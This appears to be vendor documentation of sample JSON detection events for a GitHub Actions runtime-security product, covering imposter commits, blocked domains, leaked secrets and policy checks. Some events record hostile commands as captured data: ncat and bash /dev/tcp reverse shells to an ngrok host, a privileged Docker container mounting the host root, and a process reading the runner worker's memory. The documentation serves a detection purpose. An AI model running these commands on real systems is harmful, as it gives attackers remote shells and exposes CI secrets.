# Sample Detection Events
Each detection event is streamed in real time with rich metadata about the workflow, job, detection type, and offending artifacts.
## S3 and WebHook Integrations
The following detection types are currently supported for both S3 and Webhook integrations. Each example shows a representative payload.
### Threat-Intelligence
{% hint style="info" %}
**This will be found in the threat-intel folder for S3**
{% endhint %}
```json
{
"id": "78540701-3106-4eaa-9408-8902e87bd27d",
"event_id": "78540701-3106-4eaa-9408-8902e87bd27d",
"type": "Threat-Intelligence",
"incident_start_time": "2025-09-15T22:41:00Z",
"title": "Tinycolor NPM Supply Chain Attack - 40+ Packages Compromised with Credential Harvester",
"details": "# Tinycolor NPM Supply Chain Attack - 40+ Packages Compromised\n\n## Executive Summary\n\nA malicious update to @ctrl/tinycolor (2.2M weekly downloads) was detected on npm as part of a broader supply-chain attack that impacted more than ...",
"ecosystem": "npm",
"description": "A malicious update to @ctrl/tinycolor (2.2M weekly downloads) was detected on npm as part of a broader supply-chain attack that impacted more than 40 packages spanning...",
"severity": "HIGH",
"is_active": "true",
"incident_url": "https://app.stepsecurity.io/github/your-org/threat-center/incidents/78540701-3106-4eaa-9408-8902e87bd27d"
}
```
### Action-Uses-Commit-From-Non-Default-Branch
```json
{
"id": "Action-Uses-Commit-From-Non-Default-Branch",
"event_id": "94fa7c7b-77a7-4c16-9325-2baadc771914",
"type": "Action-Uses-Commit-From-Non-Default-Branch",
"name": "Action Uses Commit From Non Default Branch",
"owner": "actions-security-demo",
"repo": "actions-security-demo/poc-1",
"workflow_id": "actions-security-demo-actions-security-demo/poc-1-.github-workflows-test-workflow.yaml",
"workflow_path": ".github/workflows/test-workflow.yaml",
"run_id": "14372875584",
"job_id": "40299087623",
"job": "Test",
"timestamp": "1744262248",
"detection": "Action-Uses-Commit-From-Non-Default-Branch-14372875584-40299087623",
"id_timestamp": "Action-Uses-Commit-From-Non-Default-Branch-1744262248",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"imposter_commit": {
"action": "ashishkurmi/hello-action",
"tag": "main",
"sha": "c5327f7d9d31e29e58e788cb3c2727f773b3d0c4",
"timestamp": "1744262248"
}
}
```
### Action-Uses-Imposter-Commit
{
"id": "Action-Uses-Imposter-Commit",
"event_id": "eb87f08e-1b0c-4de4-bbce-c7232bd7868b",
"type": "Action-Uses-Imposter-Commit",
"name": "GitHub Action Uses Imposter Commit",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445268",
"job": "imposter-commit",
"timestamp": "1753203994",
"detection": "Action-Uses-Imposter-Commit-step-security/dummy-compromised-action-c96c327cecdb71e8f031080ba8ad208feb25b13d",
"id_timestamp": "Action-Uses-Imposter-Commit-1753203994",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"imposter_commit": {
"action": "step-security/dummy-compromised-action",
"tag": "v1",
"sha": "c96c327cecdb71e8f031080ba8ad208feb25b13d",
"timestamp": "1753203994",
"is_imposter_commit": true,
"is_commit_on_default_branch": false
},
"owner_repo": "step-security/poc-workflows"
}
### Domain-Blocked
```json
{
"id": "Domain-Blocked",
"event_id": "f3843375-0b13-408f-aa81-9bf243049985",
"type": "Domain-Blocked",
"event_id": "94fa7c7b-77a7-4c16-9325-2baadc771914",
"type": "Action-Uses-Commit-From-Non-Default-Branch",
"name": "Domain Blocked",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445322",
"endpoint": "0.tcp.us-cal-1.ngrok.io.",
"timestamp": "1753204032",
"detection": "Domain-Blocked-0.tcp.us-cal-1.ngrok.io.",
"id_timestamp": "Domain-Blocked-1753204032",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows"
}
```
### HTTPS-Outbound-Network-Call
```json
{
"id": "HTTPS-Outbound-Network-Call",
"event_id": "b0ffece5-7fe4-426a-860e-f2fed217e7e9",
"type": "HTTPS-Outbound-Network-Call",
"name": "HTTPS Outbound Call",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445302",
"timestamp": "1753204001",
"detection": "HTTPS-Outbound-Network-Call-POST-api.github.com",
"method": "POST",
"host": "api.github.com",
"path": "/repos/step-security-experiments/github-actions-goat/actions/runners/registration-token",
"id_timestamp": "HTTPS-Outbound-Network-Call-1753204001",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows"
}
```
### New-Outbound-Network-Call
```json
{
"id": "New-Outbound-Network-Call",
"event_id": "0dedfda7-345f-446b-ba93-e213f5569aaf",
"type": "New-Outbound-Network-Call",
"name": "New Outbound Network Call",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445257",
"job": "anomalous-outbound-call",
"endpoint": "5ad46aa12a0f0fc0.example.com:443",
"timestamp": "1753204032",
"detection": "New-Outbound-Network-Call-5ad46aa12a0f0fc0.example.com:443",
"expected_outbound_connections": [
"github.com:443",
"www.google.com:443",
"goreleaser.com:443",
"7f6045df5f070c28.example.com:443",
"f6daed2a23eaf1c1.example.com:443",
"4baf29081c970e17.example.com:443",
"98a77cfd80e40ed6.example.com:443",
"0de402b8ec115cc9.example.com:443"
],
"id_timestamp": "New-Outbound-Network-Call-1753204032",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows"
}
```
### Privileged-Container
```json
{
"id": "Privileged-Container",
"event_id": "8b9ed240-d279-4a48-bfeb-c13937eae9b4",
"type": "Privileged-Container",
"name": "Privileged Container Detected",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445255",
"job": "privileged-conatiner",
"timestamp": "1753203999",
"detection": "Privileged-Container-privileged-conatiner",
"id_timestamp": "Privileged-Container-1753203999",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows",
"process_events": [
{
"pid": "2489",
"ppid": "2488",
"exe": "/usr/bin/docker",
"working_directory": "/home/runner/work/poc-workflows/poc-workflows",
"arguments": [
"docker",
"run",
"--privileged",
"--cap-add=ALL",
"-v",
"/:/host",
"raesene/ncat:latest",
"0.tcp.us-cal-1.ngrok.io",
"17658",
"-e",
"/bin/bash"
],
"timestamp": "2025-07-22T17:06:39.374Z"
}
]
}
```
### Reverse-Shell
```json
{
"id": "Reverse-Shell",
"event_id": "22ef2a51-73a3-4aa6-8af3-2810e2f1466d",
"type": "Reverse-Shell",
"name": "Reverse shell detected",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445255",
"job": "privileged-conatiner",
"timestamp": "1753204005",
"detection": "Reverse-Shell-privileged-conatiner",
"id_timestamp": "Reverse-Shell-1753204005",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows",
"process_events": [
{
"pid": "2569",
"ppid": "2547",
"exe": "/usr/local/bin/ncat",
"working_directory": "/",
"arguments": [
"/usr/local/bin/ncat",
"0.tcp.us-cal-1.ngrok.io",
"17658",
"-e",
"/bin/bash"
],
"timestamp": "2025-07-22T17:06:45.265Z"
}
]
}
```
### Runner-Worker-Memory-Read
```json
{
"id": "Runner-Worker-Memory-Read",
"event_id": "629abcd1-326b-4828-95d5-9d09789e35f3",
"type": "Runner-Worker-Memory-Read",
"name": "Runner Worker Memory Read",
"owner": "step-security",
"repo": "armour-tests",
"workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16463564626",
"job_id": "46535652393",
"job": "tj-actions-simulation",
"timestamp": "1753253227",
"detection": "Runner-Worker-Memory-Read-tj-actions-simulation",
"id_timestamp": "Runner-Worker-Memory-Read-1753253227",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/armour-tests",
"process_events": [
{
"pid": "2068",
"exe": "python3",
"timestamp": "2025-07-23T06:47:07.869380629Z",
"armour_event_process": {
"armour_event_kind": "FILE_READ",
"timestamp": "2025-07-23T06:47:07.869380629Z",
"file_info": {
"is_write": false,
"current_pid": 2068,
"current_exe": "python3",
"target_file": "/proc/1798/mem",
"target_pid": 1798,
"target_exe": "Runner.Worker"
},
"enforced_protection": false
}
}
]
}
```
### Secret-In-Build-Log
```json
{
"id": "Secret-In-Build-Log",
"event_id": "6489e4cf-8eb1-4a54-917e-51200b7e9991",
"type": "Secret-In-Build-Log",
"name": "Secret In Build Log",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445378",
"timestamp": "1753204001",
"detection": "Secret-In-Build-Log-handle-private-key-private-key",
"secret": "----*******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************--",
"line_number": "14",
"rule_id": "private-key",
"job_name": "handle-private-key",
"step_number": "5",
"id_timestamp": "Secret-In-Build-Log-1753204001",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows"
}
```
### Secret-In-Artifact
```json
{
"id": "Secret-In-Artifact",
"event_id": "4de78687-8c1d-4b7c-b6ed-a6144e50d31e",
"type": "Secret-In-Artifact",
"name": "Secret In Artifact",
"owner": "harden-runner-canary",
"repo": "rohan-playground",
"workflow_id": "harden-runner-canary-rohan-playground-.github-workflows-key.yml",
"workflow_path": ".github/workflows/key.yml",
"run_id": "18364110944",
"job_id": "52313382674",
"file": "private-key",
"timestamp": "1759978679",
"detection": "Secret-In-Artifact-private-key",
"secret": "----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************--",
"line_number": "0",
"rule_id": "private-key",
"job_name": "generate-key",
"path": "id_ed25519",
"id_timestamp": "Secret-In-Artifact-1759978679",
"owner_repo": "harden-runner-canary/rohan-playground",
"is_suppressed": false,
"html_url": "https://app.stepsecurity.io/github/harden-runner-canary/rohan-playground/actions/runs/18364110944?runAttempt=1",
"is_resolved": false,
"run_attempt": 1
}
```
### Source-Code-Overwritten
```json
{
"id": "Source-Code-Overwritten",
"event_id": "e7d2aa21-110c-4908-927d-3025972eb4af",
"type": "Source-Code-Overwritten",
"name": "Source Code Overwritten",
"owner": "step-security",
"repo": "armour-tests",
"workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16476557099",
"job_id": "46579649138",
"job": "source-code",
"file": "README.MD",
"timestamp": "1753288775",
"detection": "Source-Code-Overwritten-README.MD",
"path": "/home/runner/work/armour-tests/armour-tests/README.MD",
"id_timestamp": "Source-Code-Overwritten-1753288775",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/armour-tests"
}
```
### Actions-Policy-Blocked
```json
{
"id": "Actions-Policy-Blocked",
"event_id": "47258289-eba8-42c8-86c7-534a46d686b7",
"type": "Actions-Policy-Blocked",
"name": "Actions Policy Blocked",
"owner": "step-security",
"repo": "arm-int-tests",
"workflow_path": ".github/workflows/poc_workflow_int.yml",
"run_id": "16625207256",
"timestamp": "1753885200",
"detection": "Actions-Policy-Blocked-16625207256",
"id_timestamp": "1753885200",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"actions_not_allowed": [
"step-security/harden-runner@rc-20-int",
"actions/checkout@v3",
"step-security/dummy-compromised-action@v1",
"actions/checkout@v4"
]
}
```
### Runs-On-Policy-Blocked
```json
{
"id": "Runs-On-Policy-Blocked",
"event_id": "1ddb24f6-e458-4b6b-8225-a507dce365e4",
"type": "Runs-On-Policy-Blocked",
"name": "Runs-On Policy Blocked",
"owner": "step-security",
"repo": "arm-int-tests",
"workflow_path": ".github/workflows/poc_workflow_int.yml",
"run_id": "16625207256",
"timestamp": "1753885200",
"detection": "Runs-On-Policy-Blocked-16625207256",
"id_timestamp": "Runs-On-Policy-Blocked-1753885200",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"runs_on_labels_not_allowed": ["label1", "label2", ...]
}
```
### Secrets-Policy-Blocked
```json
{
"id": "Secrets-Policy-Blocked",
"event_id": "7a212823-d963-44de-9f08-edc5e3d6f6e7",
"type": "Secrets-Policy-Blocked",
"name": "Secrets Policy Blocked",
"owner": "step-security",
"repo": "arm-int-tests",
"workflow_path": ".github/workflows/poc_workflow_int.yml",
"run_id": "16625207256",
"timestamp": "1753885200",
"detection": "Secrets-Policy-Blocked-16625207256",
"id_timestamp": "Secrets-Policy-Blocked-1753885200",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"workflow_contains_secrets": "true/false",
"is_non_default_branch": "true/false",
"workflow_matches_default_ref": "true/false",
"current_branch_hash": "[hash]",
"default_branch_hash": "[hash]"
}
```
### Compromised-Actions-Policy-Blocked
```json
{
"id": "Compromised-Actions-Policy-Blocked",
"event_id": "c4838c86-df31-4258-9577-5cb2538888d0",
"type": "Compromised-Actions-Policy-Blocked",
"name": "Compromised Actions Policy Blocked",
"owner": "step-security",
"repo": "arm-int-tests",
"workflow_path": ".github/workflows/poc_workflow_int.yml",
"run_id": "16625207256",
"timestamp": "1753885200",
"detection": "Compromised-Actions-Policy-Blocked-16625207256",
"id_timestamp": "Compromised-Actions-Policy-Blocked-1753885200",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"compromised_actions_detected": ["compromised-action1", "compromised-action2", ...]
}
```
### Lockdown Detection Event
For a lockdown detection event, the `is_lockdown` key is set to true. Lockdown mode supports the following detection types:
* `Privileged-Container`
* `Reverse-Shell`
* `Runner-Worker-Memory-Read`
```json
{
"id": "Runner-Worker-Memory-Read",
"event_id": "3115187a-4882-45bf-8c5c-b1e1a09c66a3",
"name": "Runner Worker Memory Read",
"owner": "akurmi-dev-org::without-broker::org-1",
"repo": "akurmi-test-repo",
"workflow_id": "akurmi-dev-org::without-broker::org-1-akurmi-test-repo-.github-workflows-runner-worker-2.yml",
"workflow_path": ".github/workflows/runner-worker-2.yml",
"run_id": "271",
"job_id": "100000001",
"file": "/proc/1970362/mem",
"timestamp": "1764929166",
"detection": "Runner-Worker-Memory-Read-LOCKDOWN-build-arc-bottle-mppz9-runner-hw629",
"job_name": "build",
"owner_repo": "akurmi-dev-org::without-broker::org-1/akurmi-test-repo",
"process_events": [
{
"pid": "1970792",
"ppid": "1970786",
"exe": "/usr/bin/python3",
"working_directory": "/home/runner/_work/akurmi-test-repo/akurmi-test-repo",
"arguments": [
"tj.py"
],
"timestamp": "2025-12-05T10:06:04.98729481Z"
}
],
"is_suppressed": false,
"tool": {
"name": "",
"sha256": "",
"parent": null
},
"is_resolved": false,
"is_lockdown": true,
"customer_id_status": "akurmi-dev-org#Runner-Worker-Memory-Read#new",
"owner_id_status": "akurmi-dev-org::without-broker::org-1#Runner-Worker-Memory-Read#new",
"owner_repo_id_status": "akurmi-dev-org::without-broker::org-1#akurmi-test-repo#Runner-Worker-Memory-Read#new"
}
```
### NPM Package Cooldown Check Failure
Scenario: PR attempts to upgrade packages that were released very recently (within cooldown period)
```json
{
"id": "pr_check_failure_npm_cooldown_2026_02_11_12_30_45",
"event_id": "evt_8a7f3b2c1d4e5f6g",
"type": "pr_check_failure",
"check_type": "NPM-Package-Cooldown-Check",
"check_name": "NPM Package Cooldown",
"owner": "step-security",
"repo": "secure-repo",
"pr_url": "https://github.com/step-security/secure-repo/pull/123",
"head_sha": "abc123def456789",
"check_run_id": 98765432,
"checks_url": "https://github.com/step-security/secure-repo/runs/98765432",
"timestamp": "2026-02-11T12:30:45Z",
"server_name": "prod-server-01",
"failure_data": [
{
"package_name": "express",
"is_upgraded": true,
"previous_version": "4.18.2",
"current_version": "4.19.0",
"filename": "package.json",
"release_date": "2026-02-10T08:15:30Z"
},
{
"package_name": "@types/node",
"is_upgraded": true,
"previous_version": "20.10.5",
"current_version": "20.11.0",
"filename": "package.json",
"release_date": "2026-02-11T06:45:12Z"
}
]
}
```
### NPM Package Compromised Updates Check Failure
Scenario: PR upgrades to versions of packages known to be compromised
```json
{
"id": "pr_check_failure_npm_compromised_2026_02_11_14_15_30",
"event_id": "evt_9b8c4d3e2f5a6b7c",
"type": "pr_check_failure",
"check_type": "NPM-Package-Compromised-Updates-Check",
"check_name": "NPM Package Compromised Updates",
"owner": "step-security",
"repo": "secure-repo",
"pr_url": "https://github.com/step-security/secure-repo/pull/456",
"head_sha": "def789ghi012345",
"check_run_id": 98765433,
"checks_url": "https://github.com/step-security/secure-repo/runs/98765433",
"timestamp": "2026-02-11T14:15:30Z",
"server_name": "prod-server-01",
"failure_data": [
{
"package_name": "eslint-config-prettier",
"is_upgraded": true,
"previous_version": "8.10.0",
"current_version": "8.10.1",
"filename": "package.json",
"release_date": "2024-11-15T10:22:18Z"
},
{
"package_name": "@nx/devkit",
"is_upgraded": true,
"previous_version": "21.4.0",
"current_version": "21.5.0",
"filename": "package-lock.json",
"release_date": "2024-12-08T14:30:45Z"
}
]
}
```
### PWN Request Check Failure
Scenario: Workflow uses risky triggers with untrusted input that could enable pwn requests
```json
{
"id": "pr_check_failure_pwn_request_2026_02_11_16_45_20",
"event_id": "evt_7c6d5e4f3a2b1c8d",
"type": "pr_check_failure",
"check_type": "PWN-Request-Check",
"check_name": "PWN Request",
"owner": "step-security",
"repo": "secure-repo",
"pr_url": "https://github.com/step-security/secure-repo/pull/789",
"head_sha": "ghi345jkl678901",
"check_run_id": 98765434,
"checks_url": "https://github.com/step-security/secure-repo/runs/98765434",
"timestamp": "2026-02-11T16:45:20Z",
"server_name": "prod-server-01",
"failure_data": [
{
"workflow": ".github/workflows/ci.yml",
"job": "build",
"step": "Run tests",
"risky_triggers": [
"pull_request_target",
"workflow_run"
],
"risky_triggers_formatted": "pull_request_target, workflow_run",
"pwn_refs": "github.event.pull_request.title, github.event.pull_request.body",
"workflow_html_url":
"https://github.com/step-security/secure-repo/blob/main/.github/workflows/ci.yml"
},
{
"workflow": ".github/workflows/deploy.yml",
"job": "deploy-staging",
"step": "Deploy to environment",
"risky_triggers": [
"pull_request_target"
],
"risky_triggers_formatted": "pull_request_target",
"pwn_refs": "github.event.pull_request.head.ref",
"workflow_html_url":
"https://github.com/step-security/secure-repo/blob/main/.github/workflows/deploy.yml"
}
]
}
```
### Script Injection Check Failure
Scenario: Workflow contains script injection vulnerabilities using untrusted input
```json
{
"id": "pr_check_failure_script_injection_2026_02_11_18_20_15",
"event_id": "evt_6e7f8a9b0c1d2e3f",
"type": "pr_check_failure",
"check_type": "Script-Injection-Check",
"check_name": "Script Injection",
"owner": "step-security",
"repo": "secure-repo",
"pr_url": "https://github.com/step-security/secure-repo/pull/234",
"head_sha": "jkl901mno234567",
"check_run_id": 98765435,
"checks_url": "https://github.com/step-security/secure-repo/runs/98765435",
"timestamp": "2026-02-11T18:20:15Z",
"server_name": "prod-server-01",
"failure_data": [
{
"workflow": ".github/workflows/label-pr.yml",
"job": "add-labels",
"step": "Add PR labels",
"risky_triggers": [
"pull_request_target"
],
"risky_triggers_formatted": "pull_request_target",
"workflow_html_url":
"https://github.com/step-security/secure-repo/blob/main/.github/workflows/label-pr.yml"
},
{
"workflow": ".github/workflows/comment.yml",
"job": "post-comment",
"step": "Comment on PR",
"risky_triggers": [
"issue_comment",
"pull_request"
],
"risky_triggers_formatted": "issue_comment, pull_request",
"workflow_html_url":
"https://github.com/step-security/secure-repo/blob/main/.github/workflows/comment.yml"
}
]
}
```
### Baseline Check Failure (Harden-Runner)
Scenario: Runtime security detections from Harden-Runner
```json
{
"id": "pr_check_failure_baseline_2026_02_11_20_10_45",
"event_id": "evt_5f8g9h0i1j2k3l4m",
"type": "pr_check_failure",
"check_type": "Harden-Runner",
"check_name": "Harden-Runner",
"owner": "step-security",
"repo": "secure-repo",
"pr_url": "https://github.com/step-security/secure-repo/pull/567",
"head_sha": "mno567pqr890123",
"check_run_id": 98765436,
"checks_url": "https://github.com/step-security/secure-repo/runs/98765436",
"timestamp": "2026-02-11T20:10:45Z",
"server_name": "prod-server-01",
"failure_data": [
{
"id": "New-Outbound-Network-Call",
"name": "New Outbound Network Call",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445257",
"job": "anomalous-outbound-call",
"endpoint": "5ad46aa12a0f0fc0.example.com:443",
"timestamp": "1753204032",
"detection": "New-Outbound-Network-Call-5ad46aa12a0f0fc0.example.com:443",
"expected_outbound_connections": [
"github.com:443",
"www.google.com:443",
"goreleaser.com:443",
"7f6045df5f070c28.example.com:443",
"f6daed2a23eaf1c1.example.com:443",
"4baf29081c970e17.example.com:443",
"98a77cfd80e40ed6.example.com:443",
"0de402b8ec115cc9.example.com:443"
],
"id_timestamp": "New-Outbound-Network-Call-1753204032",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows"
}
]
}
```
### Insights Response
```
{
"id": "23231936150",
"id_int": 23231936150,
"repo": "harden-runner-canary/rohan-playground",
"owner": "harden-runner-canary",
"visibility": "Private",
"name": "Workflow for POCs",
"head_branch": "main",
"head_sha": "5263910a0e95f40ae3d018352f6871c2e2fae0c3",
"commit_message": "Create pco_workflow-3.yml",
"committer": "Rohan Prabhu",
"event": "workflow_dispatch",
"run_number": 21,
"path": ".github/workflows/poc_workflow.yml",
"status": "completed",
"conclusion": "failure",
"html_url": "https://github.com/harden-runner-canary/rohan-playground/actions/runs/23231936150",
"installationId": "22983908",
"runner": {
"ipAddress": ""
},
"repository": {
"id": 959003379,
"full_name": "harden-runner-canary/rohan-playground",
"private": true,
"html_url": "https://github.com/harden-runner-canary/rohan-playground"
},
"jobs": [
{
"id": 67527154559,
"run_id": 23231936150,
"html_url": "https://github.com/harden-runner-canary/rohan-playground/actions/runs/23231936150/job/67527154559",
"status": "completed",
"conclusion": "failure",
"started_at": "2026-03-18T06:22:03Z",
"completed_at": "2026-03-18T06:22:15Z",
"name": "reverse-shell",
"steps": [
{
"name": "Set up job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 1,
"started_at": "2026-03-18T06:22:04.7790954Z",
"completed_at": "2026-03-18T06:22:08.7541957Z",
"tools": [
{
"name": "/home/runner/bin/Runner.Worker",
"sha256": "/home/runner/bin/Runner.Worker",
"endpoints": [
{
"domainName": "api.github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:05.804818943Z",
"pid": "2932477"
}
]
}
]
},
{
"name": "Set up runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 2,
"started_at": "2026-03-18T06:22:08.7551957Z",
"completed_at": "2026-03-18T06:22:08.9644559Z",
"starting_process_pid": "2932742"
},
{
"name": "Pre Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 3,
"started_at": "2026-03-18T06:22:08.9654559Z",
"completed_at": "2026-03-18T06:22:09.3187455Z"
},
{
"name": "Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 4,
"started_at": "2026-03-18T06:22:09.3197455Z",
"completed_at": "2026-03-18T06:22:09.4853741Z",
"starting_process_pid": "2932774"
},
{
"name": "Reverse shell",
"status": "completed",
"conclusion": "failure",
"ref": "",
"number": 5,
"started_at": "2026-03-18T06:22:09.4863741Z",
"completed_at": "2026-03-18T06:22:09.6400098Z",
"starting_process_pid": "2932781",
"tools": [
{
"name": "bash",
"sha256": "bash",
"endpoints": [
{
"domainName": "0.tcp.us-cal-1.ngrok.io",
"port": "17658",
"timestamp": "2026-03-18T06:22:09.504587076Z",
"pid": "2932783"
}
]
}
]
},
{
"name": "Post Run step-security/harden-runner@rc-20-int",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 9,
"started_at": "2026-03-18T06:22:09.6410098Z",
"completed_at": "2026-03-18T06:22:09.8104315Z",
"starting_process_pid": "2932784"
},
{
"name": "Complete runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 10,
"started_at": "2026-03-18T06:22:09.8114315Z",
"completed_at": "2026-03-18T06:22:10.0872556Z",
"starting_process_pid": "2932791"
},
{
"name": "Complete job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 11,
"started_at": "2026-03-18T06:22:10.0882556Z",
"completed_at": "2026-03-18T06:22:10.0931793Z"
}
],
"is_sudo_process": false,
"is_sudo_feature_enabled": false,
"runner_name": "arc0-6l5vf-runner-hqtwh",
"runner_machine_group": "default",
"runner_machine_name": "arc0-6l5vf-runner-hqtwh",
"harden_runner_egress_policy": "audit",
"harden_runner_disable_telemetry": "false",
"harden_runner_disable_file_monitoring": "false",
"cluster_name": "rohan-test-v5",
"environment_type": "ARC",
"has_raw_file_events": true,
"has_raw_process_events": true,
"raw_file_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154559/file_events.json",
"raw_process_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154559/process_events.json",
"raw_events_bucket": "customer-raw-events-data-277233109775",
"actions_info": [
{
"action": "step-security/harden-runner",
"tag": "rc-20-int",
"sha": "b458cf61e24e167c05a441dec5234b240974af45",
"timestamp": "1773814925",
"is_imposter_commit": false,
"is_commit_on_default_branch": false
}
],
"suspicious_processes_control_enabled": true,
"suspicious_processes": {
"reverseShellProcesses": [
{
"pid": "2932782",
"ppid": "2932781",
"exe": "/usr/bin/bash",
"working_directory": "/home/runner/_work/rohan-playground/rohan-playground",
"arguments": [
"-c \"bash -i >& /dev/tcp/0.tcp.us-cal-1.ngrok.io/17658 0>&1\""
],
"timestamp": "2026-03-18T06:22:09.493844717Z"
}
]
},
"labels": [
"arc0"
],
"runner_group_name": "default",
"runner_group_id": 1,
"correlation_id": "arc0-6l5vf-runner-hqtwh"
},
{
"id": 67527154571,
"run_id": 23231936150,
"html_url": "https://github.com/harden-runner-canary/rohan-playground/actions/runs/23231936150/job/67527154571",
"status": "completed",
"conclusion": "success",
"started_at": "2026-03-18T06:22:38Z",
"completed_at": "2026-03-18T06:22:51Z",
"name": "imposter-commit",
"steps": [
{
"name": "Set up job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 1,
"started_at": "2026-03-18T06:22:39.4035894Z",
"completed_at": "2026-03-18T06:22:44.7892891Z",
"tools": [
{
"name": "/home/runner/bin/Runner.Worker",
"sha256": "/home/runner/bin/Runner.Worker",
"endpoints": [
{
"domainName": "api.github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:40.326292509Z",
"pid": "2936247"
}
]
},
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/_ws/ingest.sock",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:40.035631039Z"
},
{
"method": "POST",
"host": "launch.actions.githubusercontent.com",
"path": "/actions/build/8adaa2ed-028f-4d96-8c73-04a0f84583da/jobs/5d4110e3-efed-5d79-85d6-621334f7f13b/runnerresolve/actions",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:40.043174175Z"
},
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/github.actions.results.api.v1.WorkflowStepUpdateService/WorkflowStepsUpdate",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:40.12297977Z"
},
{
"method": "GET",
"host": "api.github.com",
"path": "/repos/step-security/harden-runner/tarball/b458cf61e24e167c05a441dec5234b240974af45",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:40.347256792Z"
},
{
"method": "GET",
"host": "codeload.github.com",
"path": "/step-security/harden-runner/legacy.tar.gz/b458cf61e24e167c05a441dec5234b240974af45",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:40.547701834Z"
},
{
"method": "GET",
"host": "api.github.com",
"path": "/repos/actions/checkout/tarball/f43a0e5ff2bd294095638e18286ca9a3d1956744",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:42.255863097Z"
},
{
"method": "GET",
"host": "codeload.github.com",
"path": "/actions/checkout/legacy.tar.gz/f43a0e5ff2bd294095638e18286ca9a3d1956744",
"pid": "2936247",
